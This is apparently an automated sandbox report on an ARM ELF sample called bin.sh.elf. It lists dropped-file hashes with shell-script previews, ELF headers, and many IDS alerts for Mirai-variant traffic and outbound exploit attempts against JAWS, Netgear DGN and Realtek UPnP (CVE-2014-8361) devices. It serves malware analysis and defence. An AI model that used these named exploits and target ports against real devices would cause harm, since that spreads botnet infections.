                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3727
                                                                        Entropy (8bit):5.173614270314125
                                                                        Encrypted:false
                                                                        SSDEEP:96:ikBNTBboQTybFowKrzmPJwTMpVV0nWFmV:ThBObFowAKV0nW8V
                                                                        MD5:ACEA76BAB838D1B0C3D06CF885406B13
                                                                        SHA1:DC0ED416D3C675534359EB23FFC3B96C6D72399F
                                                                        SHA-256:0E04100CC3B1902652984B7DE012464A09CAF917D66BB1479D7E0A12101CB140
                                                                        SHA-512:A196E0B4E93AC95C63CE04EB588532F1181B6DA45026A8ADFC9EA94C6CC52B9BAC0C6C8C39512F124C383FFA7D9C487BCC8D5A4DE6172962C1DAA5BA72399963
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..do_slabs_plotting().{..local file=$1..local out_file..local range="every ::$xmin"..local xtic=""..local xtic_rotate="norotate"..local lines=2000000..local wc_lines...check_file_exist "$file"...out_file=`basename "$file"`..if [ $xmax -ne 0 ]; then...range="$range::$xmax"...lines=$((xmax-xmin))..fi...wc_lines=`cat "$file" | wc -l`..if [ $? -ne 0 ] || [ "$wc_lines" -eq 0 ] ; then...wc_lines=$lines..fi...if [ "$wc_lines" -lt "$lines" ]; then...lines=$wc_lines..fi...if [ $((width / lines)) -gt $min_slab_name_size ]; then...xtic=":xtic(1)"...xtic_rotate=90..fi..gnuplot -p << EOF.#!/usr/bin/env gnuplot..set terminal png enhanced size $width,$height large.set output '$out_file.png'.set autoscale xy.set xlabel 'samples'.set ylabel 'bytes'.set style histogram columnstacked title textcolor lt -1.set style fill solid 0.15.set xtics rotate $xtic_rotate.set key left above Left title reverse..plot "$file" $range u 2$xtic title 'SIZE' with boxes,\..'' $range u 3 title '
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4209
                                                                        Entropy (8bit):5.076972113432996
                                                                        Encrypted:false
                                                                        SSDEEP:96:7clfSyzEmuUySne6nAZAT2AGzExXvGcufeB:IRSyzEH5SeduTdKExXvGcTB
                                                                        MD5:DC3C3E6F1C9C8CE13C5B08B389C754EB
                                                                        SHA1:E5104480B29198B150A9D85B4DDFC61174766421
                                                                        SHA-256:31B786EFA295D001CA8D161307A9AC0B01C609070E94D1479F88403F484AC389
                                                                        SHA-512:62FA97616A3FF0FD732924EDF8D736F733DBAFEC640E60B988F7A6E8587838B22AB633E1190F2DC96FA00638E8A7AEBFB23F2E859CCC142DC822BFD36F64C3DE
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..list_header() {..:.}..header() {..printf "\n#####################\n# $1\n" >> ${output}.}..# process one directory (incl sub-directories).dir_filelist() {..${dep_list}header "$1"...srcdir=$(echo "$1" | sed -e 's://*:/:g')..dirlist=$(find "${srcdir}" -printf "%p %m %U %G\n" | LANG=C sort)...# If $dirlist is only one line, then the directory is empty..if [ "$(echo "${dirlist}" | wc -l)" -gt 1 ]; then...${dep_list}print_mtime "$1"....echo "${dirlist}" | \...while read x; do....${dep_list}parse ${x}...done..fi.}..# if only one file is specified and it is .cpio file then use it direct as fs.# if a directory is specified then add all files in given direcotry to fs.# if a regular file is specified assume it is in gen_initramfs format.input_file() {..source="$1"..if [ -f "$1" ]; then...${dep_list}header "$1"...is_cpio="$(echo "$1" | sed 's/^.*\.cpio\(\..*\)\{0,1\}/cpio/')"...if [ $2 -eq 0 -a ${is_cpio} = "cpio" ]; then....cpio_file=$1....echo "$1" | grep -q '^.*\.cp
                                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                        Entropy (8bit):5.819759771285446
                                                                        TrID:
                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                        File name:bin.sh.elf
                                                                        File size:307'960 bytes
                                                                        MD5:6e7a24e5cf84f990d280be8fcacbea44
                                                                        SHA1:4191645bab28986b97833fcbbcb60155ddfc8f76
                                                                        SHA256:22fa811e8ed03a9accfc16313b2e75a7419c10e652987b5348ef591012bac712
                                                                        SHA512:df2453cb4c7ed7ddb9da40a0fa9d99a8bab38d596ee31ab0cffca2b19c9bb66c9a8da4a9c6672a2a2ca748eeef373d1c064e28242e8a1f18279f85f997fd3067
                                                                        SSDEEP:6144:T2s/gAWaboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bWqUmJqBxAuaPRhVabEDSDP99zBT
                                                                        TLSH:0A643A8AFD81AE25D5C126BBFE2F4289331317B8D2EB71029D145F2876CA94F0F7A541
                                                                        File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                        ELF header

                                                                        Class:ELF32
                                                                        Data:2's complement, little endian
                                                                        Version:1 (current)
                                                                        Machine:ARM
                                                                        Version Number:0x1
                                                                        Type:EXEC (Executable file)
                                                                        OS/ABI:UNIX - System V
                                                                        ABI Version:0
                                                                        Entry Point Address:0x8194
                                                                        Flags:0x4000002
                                                                        ELF Header Size:52
                                                                        Program Header Offset:52
                                                                        Program Header Size:32
                                                                        Number of Program Headers:5
                                                                        Section Header Offset:307280
                                                                        Section Header Size:40
                                                                        Number of Section Headers:17
                                                                        Header String Table Index:16
                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                        NULL0x00x00x00x00x0000
                                                                        .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                        .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                        .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                        .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                        .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                        .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                        .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                        .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                        .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                        .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                        .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                        .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                        .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                        .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                        .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                        .shstrtabSTRTAB0x00x4afbe0x900x00x0001
                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                        EXIDX0x405800x485800x485800x1280x1284.64500x4R 0x4.ARM.exidx
                                                                        LOAD0x00x80000x80000x406a80x406a86.20270x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                        LOAD0x410000x510000x510000x9fa80x2fb382.22440x6RW 0x8000.eh_frame .tbss .init_array .fini_array .data.rel.ro .got .data .bss
                                                                        TLS0x410040x510040x510040x00x80.00000x4R 0x4.tbss
                                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-06T00:36:57.247634+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234763059.127.6.1280TCP
                                                                        2024-12-06T00:36:57.247634+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234763059.127.6.1280TCP
                                                                        2024-12-06T00:36:57.603942+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234218424.111.109.1138080TCP
                                                                        2024-12-06T00:36:57.831972+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235115684.240.86.1605555TCP
                                                                        2024-12-06T00:36:57.979868+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347284213.33.239.1535555TCP
                                                                        2024-12-06T00:36:58.055850+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347336114.134.116.21452869TCP
                                                                        2024-12-06T00:36:58.179837+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233410414.89.23.365555TCP
                                                                        2024-12-06T00:36:58.215826+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347146112.185.80.517574TCP
                                                                        2024-12-06T00:37:05.847534+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356874118.175.124.2580TCP
                                                                        2024-12-06T00:37:05.847534+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356874118.175.124.2580TCP
                                                                        2024-12-06T00:37:05.847908+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235971639.116.5.1358080TCP
                                                                        2024-12-06T00:37:05.848291+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338788169.40.164.18180TCP
                                                                        2024-12-06T00:37:05.848291+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338788169.40.164.18180TCP
                                                                        2024-12-06T00:37:05.848656+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235309643.79.133.1180TCP
                                                                        2024-12-06T00:37:05.849031+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233403086.51.139.1997574TCP
                                                                        2024-12-06T00:37:05.849401+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336824117.116.60.18649152TCP
                                                                        2024-12-06T00:37:05.850147+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341790169.253.87.24280TCP
                                                                        2024-12-06T00:37:05.851260+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235081420.138.27.15980TCP
                                                                        2024-12-06T00:37:05.851627+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360360144.192.196.18149152TCP
                                                                        2024-12-06T00:37:05.852368+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351946160.64.200.25080TCP
                                                                        2024-12-06T00:37:05.854983+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234727898.35.241.7852869TCP
                                                                        2024-12-06T00:37:05.855353+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233937080.180.109.8680TCP
                                                                        2024-12-06T00:37:05.856099+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355266144.94.116.22480TCP
                                                                        2024-12-06T00:37:05.856099+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355266144.94.116.22480TCP
                                                                        2024-12-06T00:37:05.856479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352542146.136.103.16349152TCP
                                                                        2024-12-06T00:37:05.857232+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346736104.212.159.1348080TCP
                                                                        2024-12-06T00:37:05.857975+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337904164.194.135.2385555TCP
                                                                        2024-12-06T00:37:05.858338+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336750214.127.3.3780TCP
                                                                        2024-12-06T00:37:05.859094+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342858110.77.244.5449152TCP
                                                                        2024-12-06T00:37:05.859847+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347338156.177.99.17949152TCP
                                                                        2024-12-06T00:37:05.860219+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344516129.222.135.498080TCP
                                                                        2024-12-06T00:37:05.860591+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234520463.218.221.15049152TCP
                                                                        2024-12-06T00:37:05.860973+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347792152.156.223.1708080TCP
                                                                        2024-12-06T00:37:05.861722+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354214174.112.238.1508080TCP
                                                                        2024-12-06T00:37:05.862087+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233813848.209.236.16480TCP
                                                                        2024-12-06T00:37:05.862788+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350372100.40.238.1587574TCP
                                                                        2024-12-06T00:37:05.863527+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335422142.225.53.12980TCP
                                                                        2024-12-06T00:37:05.863895+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235884273.149.43.25380TCP
                                                                        2024-12-06T00:37:05.864278+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234525243.10.138.1868080TCP
                                                                        2024-12-06T00:37:05.865404+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2337388121.208.165.18552869TCP
                                                                        2024-12-06T00:37:05.865771+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337236159.226.179.18980TCP
                                                                        2024-12-06T00:37:05.865771+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337236159.226.179.18980TCP
                                                                        2024-12-06T00:37:05.866151+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233579684.207.247.1195555TCP
                                                                        2024-12-06T00:37:05.866901+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352382187.208.34.3880TCP
                                                                        2024-12-06T00:37:05.867270+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349374204.19.175.14449152TCP
                                                                        2024-12-06T00:37:05.868751+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354204161.159.158.2518080TCP
                                                                        2024-12-06T00:37:05.869130+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2353898140.49.192.1152869TCP
                                                                        2024-12-06T00:37:05.869888+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23462521.98.140.4280TCP
                                                                        2024-12-06T00:37:05.870253+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356896145.217.58.1498080TCP
                                                                        2024-12-06T00:37:05.870636+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359518199.176.49.449152TCP
                                                                        2024-12-06T00:37:05.871002+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235449479.72.226.1288080TCP
                                                                        2024-12-06T00:37:05.871400+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349352189.47.162.685555TCP
                                                                        2024-12-06T00:37:05.871776+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2339810157.80.252.2552869TCP
                                                                        2024-12-06T00:37:05.872897+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235651256.75.49.17380TCP
                                                                        2024-12-06T00:37:05.872897+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235651256.75.49.17380TCP
                                                                        2024-12-06T00:37:05.873652+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234493048.71.73.508080TCP
                                                                        2024-12-06T00:37:05.874388+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234957637.133.196.20449152TCP
                                                                        2024-12-06T00:37:05.875135+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338960102.154.96.7880TCP
                                                                        2024-12-06T00:37:05.875506+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333780222.96.144.1680TCP
                                                                        2024-12-06T00:37:05.875506+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333780222.96.144.1680TCP
                                                                        2024-12-06T00:37:05.876628+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350436216.190.220.5480TCP
                                                                        2024-12-06T00:37:05.876628+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350436216.190.220.5480TCP
                                                                        2024-12-06T00:37:05.876996+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234919468.42.36.21080TCP
                                                                        2024-12-06T00:37:05.877375+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234992450.191.49.1718080TCP
                                                                        2024-12-06T00:37:05.877738+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340472197.142.218.1368080TCP
                                                                        2024-12-06T00:37:05.878121+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235743657.194.223.2415555TCP
                                                                        2024-12-06T00:37:05.879605+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23564489.106.14.12380TCP
                                                                        2024-12-06T00:37:05.879974+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235850285.46.119.845555TCP
                                                                        2024-12-06T00:37:05.880342+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233562426.112.167.5480TCP
                                                                        2024-12-06T00:37:05.880342+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233562426.112.167.5480TCP
                                                                        2024-12-06T00:37:05.880717+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354806121.86.29.24980TCP
                                                                        2024-12-06T00:37:05.881088+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345614135.20.150.2195555TCP
                                                                        2024-12-06T00:37:05.882568+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336408157.88.62.3580TCP
                                                                        2024-12-06T00:37:05.883323+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360758178.165.8.797574TCP
                                                                        2024-12-06T00:37:05.883687+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234017027.18.230.1395555TCP
                                                                        2024-12-06T00:37:05.884062+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345060176.86.103.2949152TCP
                                                                        2024-12-06T00:37:05.885180+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335532115.248.132.478080TCP
                                                                        2024-12-06T00:37:05.885547+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233501245.231.135.1898080TCP
                                                                        2024-12-06T00:37:05.885917+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347554146.20.246.1885555TCP
                                                                        2024-12-06T00:37:05.886290+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352578142.230.94.507574TCP
                                                                        2024-12-06T00:37:05.886665+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23556841.213.1.22352869TCP
                                                                        2024-12-06T00:37:05.887045+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233347646.14.252.19480TCP
                                                                        2024-12-06T00:37:05.887419+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354866212.19.173.1918080TCP
                                                                        2024-12-06T00:37:05.887789+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233674492.38.181.8752869TCP
                                                                        2024-12-06T00:37:05.888160+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233372422.47.205.19480TCP
                                                                        2024-12-06T00:37:05.888905+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355996181.78.116.238080TCP
                                                                        2024-12-06T00:37:05.889277+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234496269.200.69.1387574TCP
                                                                        2024-12-06T00:37:05.890027+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348206209.39.207.1505555TCP
                                                                        2024-12-06T00:37:05.890781+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341216212.175.190.2880TCP
                                                                        2024-12-06T00:37:05.891154+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235077652.35.25.2080TCP
                                                                        2024-12-06T00:37:05.891529+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235308663.90.139.1028080TCP
                                                                        2024-12-06T00:37:05.892665+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348190150.49.139.12980TCP
                                                                        2024-12-06T00:37:05.893409+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336822184.220.87.2415555TCP
                                                                        2024-12-06T00:37:05.894891+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355738177.124.131.21052869TCP
                                                                        2024-12-06T00:37:05.895260+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336670108.175.170.1937574TCP
                                                                        2024-12-06T00:37:05.895644+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348816103.159.239.638080TCP
                                                                        2024-12-06T00:37:05.896013+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346456149.193.148.348080TCP
                                                                        2024-12-06T00:37:05.897133+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235254419.154.130.11780TCP
                                                                        2024-12-06T00:37:05.897870+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334596128.12.140.2468080TCP
                                                                        2024-12-06T00:37:05.898252+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346434190.123.58.15449152TCP
                                                                        2024-12-06T00:37:05.898620+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338892142.115.135.3280TCP
                                                                        2024-12-06T00:37:05.898620+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338892142.115.135.3280TCP
                                                                        2024-12-06T00:37:05.899380+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351804159.189.182.1007574TCP
                                                                        2024-12-06T00:37:05.899757+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233531499.162.112.18752869TCP
                                                                        2024-12-06T00:37:05.900124+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233513038.189.25.21780TCP
                                                                        2024-12-06T00:37:05.900870+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235925855.139.42.17449152TCP
                                                                        2024-12-06T00:37:05.901238+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233287053.223.145.17480TCP
                                                                        2024-12-06T00:37:05.902729+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234599283.191.83.2348080TCP
                                                                        2024-12-06T00:37:05.903097+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350074128.100.55.448080TCP
                                                                        2024-12-06T00:37:05.903480+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234982270.136.186.818080TCP
                                                                        2024-12-06T00:37:05.903849+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235953670.1.42.2225555TCP
                                                                        2024-12-06T00:37:05.904605+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235913825.203.243.1028080TCP
                                                                        2024-12-06T00:37:05.905720+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354560108.8.51.277574TCP
                                                                        2024-12-06T00:37:05.906085+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235419026.165.219.867574TCP
                                                                        2024-12-06T00:37:05.906459+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342796210.76.1.25380TCP
                                                                        2024-12-06T00:37:05.907947+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233292043.136.192.628080TCP
                                                                        2024-12-06T00:37:05.908321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235903068.104.71.2438080TCP
                                                                        2024-12-06T00:37:05.908692+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235041874.121.250.4849152TCP
                                                                        2024-12-06T00:37:05.909079+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348828101.130.93.1928080TCP
                                                                        2024-12-06T00:37:05.910596+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344440179.184.84.3480TCP
                                                                        2024-12-06T00:37:05.910977+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235776473.90.183.6380TCP
                                                                        2024-12-06T00:37:05.910977+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235776473.90.183.6380TCP
                                                                        2024-12-06T00:37:05.911352+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235187090.153.54.2448080TCP
                                                                        2024-12-06T00:37:05.911720+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343626214.111.203.478080TCP
                                                                        2024-12-06T00:37:05.912850+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234351639.11.173.15580TCP
                                                                        2024-12-06T00:37:05.913978+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339156151.36.87.5280TCP
                                                                        2024-12-06T00:37:05.914338+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235509048.90.206.1698080TCP
                                                                        2024-12-06T00:37:05.914716+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233385814.239.128.17080TCP
                                                                        2024-12-06T00:37:05.915087+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235367267.237.240.847574TCP
                                                                        2024-12-06T00:37:05.915469+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348966101.172.124.15580TCP
                                                                        2024-12-06T00:37:05.916959+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340688219.63.223.1680TCP
                                                                        2024-12-06T00:37:05.916959+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340688219.63.223.1680TCP
                                                                        2024-12-06T00:37:05.917330+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353360153.240.186.21049152TCP
                                                                        2024-12-06T00:37:05.917699+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234133473.18.143.20480TCP
                                                                        2024-12-06T00:37:05.918445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235298232.160.241.6349152TCP
                                                                        2024-12-06T00:37:05.918780+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355498182.198.195.13080TCP
                                                                        2024-12-06T00:37:05.918780+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355498182.198.195.13080TCP
                                                                        2024-12-06T00:37:05.919892+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348332197.204.137.5880TCP
                                                                        2024-12-06T00:37:05.920258+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235430494.56.235.175555TCP
                                                                        2024-12-06T00:37:05.922851+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235000277.121.98.24749152TCP
                                                                        2024-12-06T00:37:05.923225+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354840109.222.95.217574TCP
                                                                        2024-12-06T00:37:05.923598+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349594199.23.101.885555TCP
                                                                        2024-12-06T00:37:05.923963+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235048673.177.193.22080TCP
                                                                        2024-12-06T00:37:05.924338+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2352078191.245.227.8352869TCP
                                                                        2024-12-06T00:37:05.924706+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344882181.245.251.14649152TCP
